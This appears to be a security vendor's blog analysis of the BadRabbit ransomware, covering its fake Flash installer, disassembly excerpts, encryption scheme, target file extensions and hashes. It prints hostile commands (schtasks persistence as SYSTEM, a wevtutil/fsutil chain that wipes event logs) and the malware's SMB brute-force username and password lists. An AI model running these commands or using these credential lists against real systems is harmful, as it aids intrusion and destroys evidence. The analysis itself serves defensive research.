“BadRabbit” Ransomware Hits Businesses Across Europe

Trustlook Labs has investigated a ransomware outbreak dubbed “BadRabbit,” which is sweeping public organizations and businesses such as airports, banks and power utilities in Russia, Ukraine, Turkey and Bulgaria.

The malware is masked as an Adobe Flash player installer when a user clicks and downloads the file from a phishing website. The dropper (MD5: fbbdc39af1139aebba4da004475e8839) drops a DLL module into C:\Windows\infpub.dat, which is the main BadRabbit payload, and runs as C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

0119138A  |TEST CX,CX

0119138D  \JNZ SHORT BR.01191380

0119138F  PUSH 30C                                 ; /BufSize = 30C (780.)

01191394  LEA ECX,DWORD PTR SS:[EBP-61C]           ; |

0119139A  PUSH ECX                                 ; |Buffer

0119139B  CALL DWORD PTR DS:[; \GetSystemDirectoryW

011913A1  TEST EAX,EAX

011913A3  JE BR.01191487

011913A9  PUSH BR.01196CF8                         ; /StringToAdd = "\rundll32.exe"

011913AE  LEA EDX,DWORD PTR SS:[EBP-61C]           ; |

011913B4  PUSH EDX                                 ; |ConcatString

011913B5  CALL DWORD PTR DS:[] ; \lstrcatW

011913BB  TEST EAX,EAX

011913BD  JE BR.01191487

011913C3  LEA EAX,DWORD PTR SS:[EBP-1258]

011913C9  PUSH EAX                                 ; /Arg1

011913CA  LEA ECX,DWORD PTR SS:[EBP-1254]          ; |

011913D0  CALL BR.011910C0                         ; \BR.011910C0

011913D5  TEST EAX,EAX

011913D7  JE BR.01191487

011913DD  MOV ECX,DWORD PTR SS:[EBP-1258]

011913E3  PUSH EBX

011913E4  MOV EBX,DWORD PTR SS:[EBP-1254]

011913EA  PUSH ECX                                 ; /Arg1

011913EB  CALL BR.01191260                         ; \BR.01191260

011913F0  POP EBX

011913F1  TEST EAX,EAX

011913F3  JE BR.01191487

011913F9  LEA EDX,DWORD PTR SS:[EBP-124C]

011913FF  PUSH EDX                                 ; /

01191400  PUSH BR.01196D40                         ; | = "infpub.dat"

01191405  LEA EAX,DWORD PTR SS:[EBP-61C]           ; |

0119140B  PUSH EAX                                 ; |

0119140C  LEA ECX,DWORD PTR SS:[EBP-C34]           ; |

01191412  PUSH BR.01196D58                         ; |Format = "%ws C:\Windows\%ws,#1 %ws"

01191417  PUSH ECX                                 ; |s

01191418  CALL DWORD PTR DS:[]  ; \wsprintfW

The malware also drops the files “C:\Windows\dispci.exe” and “C:\Windows\cscc.dat”. The malware creates scheduled tasks to execute the file, and the executable will install a malicious bootloader.

6C561077  PUSH DWORD PTR SS:[EBP+8]

6C56107A  PUSH EAX

6C56107B  LEA EAX,DWORD PTR SS:[EBP-618]

6C561081  PUSH infpub.6C570028                            ; UNICODE "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%ws /C Start \"\" \"%wsdispci.exe\" -id %u "

6C561086  PUSH EAX

6C561087  CALL DWORD PTR DS:[]         ; USER32.wsprintfW

[...]

6C5682BB  LEA EAX,DWORD PTR SS:[EBP-658]

6C5682C1  PUSH EAX

6C5682C2  LEA EAX,DWORD PTR SS:[EBP-E58]

6C5682C8  PUSH infpub.6C571820                            ; UNICODE "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00"

6C5682CD  PUSH EAX

6C5682CE  CALL DWORD PTR DS:[]         ; USER32.wsprintfW

6C5682D4  ADD ESP,14

The malware generates a random key by calling “CryptGenRandom”, then encrypts the key with the embedded RSA-2048 pubic key:

image1

The key is then used to encrypt the files on the system with the AES-128 encryption algorithm. The malware encrypts files with the following file extensions:

.3ds, .7z, .accdb, .ai, .asm, .asp, .aspx, .avhd, .back, .bak, .bmp, .brw, .c, .cab, .cc, .cer, .cfg, .conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der, .dib, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .hpp, .hxx, .iso, .java, .jfif, .jpe, .jpeg, .jpg, .js, .kdbx, .key, .mail, .mdb, .msg, .nrg, .odc, .odf, .odg, .odi, .odm, .odp, .ods, .odt, .ora, .ost, .ova, .ovf, .p12, .p7b, .p7c, .pdf, .pem, .pfx, .php, .pmf, .png, .ppt, .pptx, .ps1, .pst, .pvi, .py, .pyc, .pyw, .qcow, .qcow2, .rar, .rb, .rtf, .scm, .sln, .sql, .tar, .tib, .tif, .tiff, .vb, .vbox, .vbs, .vcb, .vdi, .vfd, .vhd, .vhdx, .vmc, .vmdk, .vmsd, .vmtm, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xml, .xvd, .zip

The malware skips the files under the following directories:

\Windows
\Program Files
\ProgramData
\AppData

The ransom message “Readme.txt” is written in the root of drives.

After the scheduled task reboots the system, the following ransom note is shown on the system:

image2

The malware run “wevtutil” and “fsutil” commands to clean event logs:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

The malware also attempts to affect the system on the network. It uses the following embedded username/password to do a brute-force login into the other system over SMB.

Usernames:
alex
netguest
superuser
nasadmin
nasuser
nas
ftpadmin
ftpuser
asus
backup
operator
other user
work
support
manager
rdpadmin
rdpuser
rdp
ftp
boss
buh
root
Test
user-1
User1
User
Guest
Admin
Administrator

Passwords:
god
sex
secret
love
321
123321
uiop
zxcv
zxc321
zxc123
zxc
qwerty123
qwerty
qwert
qwer
qwe321
qwe123
qwe
777
77777
55555
111111
password
test123
admin123Test
Admin123
user123
User123
guest123
Guest123
administrato
Administrato
1234567890
123456789
12345678
1234567
123456
12345
1234
123
test
adminTest
user
guest
administrator

Hashes (MD5)
Trustlook Labs has identified the following hashes associated with BadRabbit:

Dropper:
fbbdc39af1139aebba4da004475e8839

Payload:
1d724f95c61f1055f0d02c2154bbccd3 c:\Windows\infpub.dat
b14d8faf7f0cbcfad051cefe5f39645f c:\Windows\dispci.exe
b4e6d97dafd9224ed9a547d52c26ce02 c:\Windows\cscc.dat

Summary
The ability to spread via SMB makes the BadRabbit ransomware particularly destructive, as it can infect systems in the network very quickly and easily. It is further proof that ransomware, with its monetary incentives, continues to be the trend of malware developed by criminal hackers. Thankfully, Trustlook’s antivirus engine can effectively detect ransomware attacks and protect our customers.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s